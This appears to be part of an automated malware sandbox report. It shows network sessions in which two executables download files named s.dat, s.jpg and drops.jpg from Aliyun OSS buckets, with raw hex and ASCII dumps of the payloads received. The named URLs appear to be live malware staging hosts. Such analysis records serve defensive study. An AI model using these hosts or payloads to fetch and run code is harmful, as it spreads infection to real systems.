2025-01-07 03:22:06 UTC	4096	IN	Data Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-07 03:22:06 UTC	4096	IN	Data Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-07 03:22:06 UTC	4096	IN	Data Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-07 03:22:06 UTC	4096	IN	Data Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
2025-01-07 03:22:06 UTC	4096	IN	Data Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	39.103.20.48	443	7648	C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:14 UTC	111	OUT	GET /s.dat HTTP/1.1 User-Agent: GetData Host: jylhok.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:14 UTC	561	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:14 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 677C9DE65C8CDB39391344F8 Accept-Ranges: bytes ETag: "34EF3688CC82D4AC3178964E521B1CA0" Last-Modified: Tue, 07 Jan 2025 03:22:12 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 16993049381629777169 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: NO82iMyC1KwxeJZOUhscoA== x-oss-server-time: 17
2025-01-07 03:22:14 UTC	3535	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-07 03:22:14 UTC	4096	IN	Data Raw: 23 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 Data Ascii: #_##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-07 03:22:14 UTC	4096	IN	Data Raw: 8e 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2025-01-07 03:22:15 UTC	4096	IN	Data Raw: 38 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f Data Ascii: 80JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKS
2025-01-07 03:22:15 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-07 03:22:15 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-07 03:22:15 UTC	4096	IN	Data Raw: 67 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed Data Ascii: gG<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-07 03:22:15 UTC	161	IN	Data Raw: 27 bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 df a2 a1 dd Data Ascii: 'VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	39.103.20.48	443	7648	C:\Users\user\Desktop\287438657364-7643738421.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:16 UTC	111	OUT	GET /s.jpg HTTP/1.1 User-Agent: GetData Host: jylhok.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:16 UTC	544	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:16 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 677C9DE89F27CB3537D5BA9D Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 11
2025-01-07 03:22:16 UTC	3552	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-07 03:22:16 UTC	4096	IN	Data Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2025-01-07 03:22:16 UTC	651	IN	Data Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49835	118.178.60.9	443	7296	C:\Users\user\Documents\lOXFJk.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:31 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:31 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:31 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 677C9DF7DC44E039311BEA39 Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 4
2025-01-07 03:22:31 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2025-01-07 03:22:31 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
